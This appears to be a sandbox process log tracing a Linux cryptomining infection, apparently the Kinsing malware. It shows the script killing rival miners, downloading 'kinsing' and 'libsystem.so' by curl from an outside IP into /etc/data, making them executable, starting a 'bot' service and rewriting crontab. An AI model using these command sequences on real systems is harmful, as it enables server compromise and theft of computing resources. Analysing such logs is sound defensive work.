/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1442
-
-
/usr/bin/idid -u2⤵PID:1443
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1444 -
/usr/sbin/sendmailsendmail -t3⤵PID:1447
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmMxD-0000NL-3J4⤵
- Reads CPU attributes
PID:1460
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1450
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmMxD-0000NO-4J4⤵
- Reads CPU attributes
PID:1461
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1451
-
-
-
/usr/bin/idid -u2⤵PID:1452
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1453
-
-
/bin/unameuname -m2⤵PID:1454
-
-
/bin/lsls -la /etc/data2⤵PID:1456
-
-
/bin/grepgrep -e /dev2⤵PID:1457
-
-
/bin/grepgrep -v grep2⤵PID:1458
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1459
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1462
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:1464
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
PID:1465
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
PID:1466
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1467
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1470
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1471
-
-
/bin/grepgrep :14142⤵PID:1473
-
-
/bin/grepgrep -v -2⤵PID:1476
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1474
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1475
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1477
-
-
/bin/grepgrep -v grep2⤵PID:1480
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1479
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1481
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1482
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1478
-
-
/bin/grepgrep stratum2⤵PID:1484
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1483
-
-
/bin/grepgrep -v grep2⤵PID:1485
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1487
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1486
-
-
/bin/grepgrep -v grep2⤵PID:1490
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1491
-
-
/bin/grepgrep Sofia2⤵PID:1489
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1492
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1488
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1493
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1497
-
-
/bin/grepgrep -v grep2⤵PID:1496
-
-
/bin/grepgrep tracepath2⤵PID:1495
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1498
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1494
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1502
-
-
/bin/grepgrep -v grep2⤵PID:1501
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1503
-
-
/bin/grepgrep /dot2⤵PID:1500
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1499
-
-
/bin/grepgrep -v grep2⤵PID:1506
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1507
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1505
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1508
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1504
-
-
/bin/grepgrep -v grep2⤵PID:1511
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1512
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1513
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1510
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1509
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1517
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1518
-
-
/bin/grepgrep -v grep2⤵PID:1516
-
-
/bin/grepgrep "bash -k"2⤵PID:1515
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1514
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1522
-
-
/bin/grepgrep -v grep2⤵PID:1521
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1523
-
-
/bin/grepgrep perfctl2⤵PID:1520
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1519
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1524
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1525
-
-
/bin/grepgrep -v grep2⤵PID:1528
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1529
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1530
-
-
/bin/grepgrep ./ll12⤵PID:1527
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1526
-
-
/bin/grepgrep -v grep2⤵PID:1533
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1534
-
-
/bin/grepgrep agetty2⤵PID:1532
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1535
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1531
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
- Reads runtime system information
PID:1536
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1540
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1539
-
-
/bin/grepgrep -v -2⤵PID:1541
-
-
/bin/grepgrep 207.38.87.62⤵PID:1538
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1542
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1545
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1544
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1546
-
-
/bin/grepgrep -v -2⤵PID:1547
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1548
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1551
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1552
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1550
-
-
/bin/grepgrep -v -2⤵PID:1553
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1554
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1556
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1557
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1558
-
-
/bin/grepgrep -v -2⤵PID:1559
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1560
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1563
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1564
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1562
-
-
/bin/grepgrep -v -2⤵PID:1565
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1566
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
PID:1567
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
PID:1568
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
- Reads runtime system information
PID:1569
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
- Reads runtime system information
PID:1570
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1571
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1572
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1573
-
-
/usr/bin/pkillpkill -f srv002⤵PID:1574
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
PID:1575
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
PID:1576
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1577
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
PID:1578
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
PID:1580
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
PID:1581
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
PID:1582
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1583
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1584
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1585
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
PID:1586
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1587
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1588
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1589
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵PID:1590
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
PID:1591
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
PID:1592
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1593
-
-
/bin/grepgrep -v grep2⤵PID:1596
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1597
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1598
-
-
/bin/grepgrep ./udp2⤵PID:1595
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1594
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1599
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1601
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1600
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1602
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1603
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1604
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1605
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1607
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1606
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1608
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1609
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1610
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1611
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1613
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1612
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1614
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1616
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1615
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1617
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1618
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1619
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1620
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1621
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1622
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1623
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
- Reads runtime system information
PID:1625
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1624
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1626
-
-
/bin/catcat /data/./oka.pid2⤵PID:1627
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1628
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1629
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1631
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1630
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1632
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1634
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1633
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
PID:1635
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
PID:1636
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
PID:1637
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1638
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1639
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
PID:1640
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1641
-
-
/bin/grepgrep -v grep2⤵PID:1644
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1645
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1646
-
-
/bin/grepgrep ./oka2⤵PID:1643
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1642
-
-
/bin/grepgrep -v grep2⤵PID:1649
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1650
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1648
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1651
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1647
-
-
/bin/grepgrep -v bin2⤵PID:1654
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1653
-
-
/bin/grepgrep -v "\\["2⤵PID:1655
-
-
/bin/grepgrep -v "("2⤵PID:1656
-
-
/bin/grepgrep -v php-fpm2⤵PID:1657
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1652
-
-
/bin/grepgrep -v proxymap2⤵PID:1658
-
-
/bin/grepgrep -v postgres2⤵PID:1659
-
-
/bin/grepgrep -v postgrey2⤵PID:1660
-
-
/bin/grepgrep -v kinsing2⤵PID:1661
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1662
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1663
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1665
-
-
/bin/grepgrep -v bin2⤵PID:1666
-
-
/bin/grepgrep -v "\\["2⤵PID:1667
-
-
/bin/grepgrep -v "("2⤵PID:1668
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1664
-
-
/bin/grepgrep -v php-fpm2⤵PID:1669
-
-
/bin/grepgrep -v proxymap2⤵PID:1670
-
-
/bin/grepgrep -v postgres2⤵PID:1671
-
-
/bin/grepgrep -v postgrey2⤵PID:1672
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1673
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1674
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1676
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1675
-
-
/bin/grepgrep -v bin2⤵PID:1677
-
-
/bin/grepgrep -v "\\["2⤵PID:1678
-
-
/bin/grepgrep -v "("2⤵PID:1679
-
-
/bin/grepgrep -v php-fpm2⤵PID:1680
-
-
/bin/grepgrep -v proxymap2⤵PID:1681
-
-
/bin/grepgrep -v postgres2⤵PID:1682
-
-
/bin/grepgrep -v postgrey2⤵PID:1683
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1684
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1685
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1688
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1689
-
-
/bin/grepgrep -v grep2⤵PID:1687
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1690
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1686
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1694
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1693
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1695
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1696
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1697
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1698
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1702
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1701
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1705
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1706
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1707
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1708
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1709
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1712
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1713
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1714
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1715
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1716
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1719
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1720
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1721
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1722
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1723
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1724
-
-
/usr/bin/idid -u2⤵PID:1726
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1727
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1740
-
-
/bin/sedsed /base64/d2⤵PID:1745
-
-
/usr/bin/crontabcrontab -l2⤵PID:1744
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1746
-
-
/bin/sedsed /_cron/d2⤵PID:1748
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1749
-
-
/usr/bin/crontabcrontab -l2⤵PID:1747
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1752
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1751
-
-
/usr/bin/crontabcrontab -l2⤵PID:1750
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1755
-
-
/bin/sedsed /update.sh/d2⤵
- Reads runtime system information
PID:1754
-
-
/usr/bin/crontabcrontab -l2⤵PID:1753
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1758
-
-
/bin/sedsed /logo4/d2⤵PID:1757
-
-
/usr/bin/crontabcrontab -l2⤵PID:1756
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1761
-
-
/bin/sedsed /logo9/d2⤵PID:1760
-
-
/usr/bin/crontabcrontab -l2⤵PID:1759
-
-
/bin/sedsed /logo0/d2⤵PID:1763
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1764
-
-
/usr/bin/crontabcrontab -l2⤵PID:1762
-
-
/bin/sedsed /logo/d2⤵PID:1766
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:1767
-
-
/usr/bin/crontabcrontab -l2⤵PID:1765
-
-
/bin/sedsed /tor2web/d2⤵PID:1769
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1770
-
-
/usr/bin/crontabcrontab -l2⤵PID:1768
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1773
-
-
/bin/sedsed /jpg/d2⤵PID:1772
-
-
/usr/bin/crontabcrontab -l2⤵PID:1771
-
-
/bin/sedsed /png/d2⤵PID:1775
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1776
-
-
/usr/bin/crontabcrontab -l2⤵PID:1774
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1779
-
-
/bin/sedsed /tmp/d2⤵PID:1778
-
-
/usr/bin/crontabcrontab -l2⤵PID:1777
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1782
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1781
-
-
/usr/bin/crontabcrontab -l2⤵PID:1780
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1784
-
-
/usr/bin/crontabcrontab -l2⤵PID:1783
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1785
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1788
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1787
-
-
/usr/bin/crontabcrontab -l2⤵PID:1786
-
-
/bin/sedsed /pastebin/d2⤵PID:1790
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1791
-
-
/usr/bin/crontabcrontab -l2⤵PID:1789
-
-
/bin/sedsed /onion/d2⤵PID:1793
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1794
-
-
/usr/bin/crontabcrontab -l2⤵PID:1792
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1797
-
-
/bin/sedsed /lsd.systemten.org/d2⤵
- Reads runtime system information
PID:1796
-
-
/usr/bin/crontabcrontab -l2⤵PID:1795
-
-
/bin/sedsed /shuf/d2⤵PID:1799
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1800
-
-
/usr/bin/crontabcrontab -l2⤵PID:1798
-
-
/bin/sedsed /ash/d2⤵PID:1802
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1803
-
-
/usr/bin/crontabcrontab -l2⤵PID:1801
-
-
/bin/sedsed /mr.sh/d2⤵PID:1805
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1806
-
-
/usr/bin/crontabcrontab -l2⤵PID:1804
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1808
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1809
-
-
/usr/bin/crontabcrontab -l2⤵PID:1807
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1811
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1812
-
-
/usr/bin/crontabcrontab -l2⤵PID:1810
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1818
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1817
-
-
/usr/bin/crontabcrontab -l2⤵PID:1816
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1820
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1821
-
-
/usr/bin/crontabcrontab -l2⤵PID:1819
-
-
/bin/sedsed /github/d2⤵PID:1823
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1824
-
-
/usr/bin/crontabcrontab -l2⤵PID:1822
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1827
-
-
/usr/bin/crontabcrontab -l2⤵PID:1825
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1826
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1829
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1830
-
-
/usr/bin/crontabcrontab -l2⤵PID:1828
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1832
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1833
-
-
/usr/bin/crontabcrontab -l2⤵PID:1831
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1836
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1835
-
-
/usr/bin/crontabcrontab -l2⤵PID:1834
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1838
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1839
-
-
/usr/bin/crontabcrontab -l2⤵PID:1837
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1842
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1841
-
-
/usr/bin/crontabcrontab -l2⤵PID:1840
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1845
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1844
-
-
/usr/bin/crontabcrontab -l2⤵PID:1843
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1847
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1848
-
-
/usr/bin/crontabcrontab -l2⤵PID:1846
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1850
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1851
-
-
/usr/bin/crontabcrontab -l2⤵PID:1849
-
-
/bin/sedsed /update.sh/d2⤵PID:1853
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1854
-
-
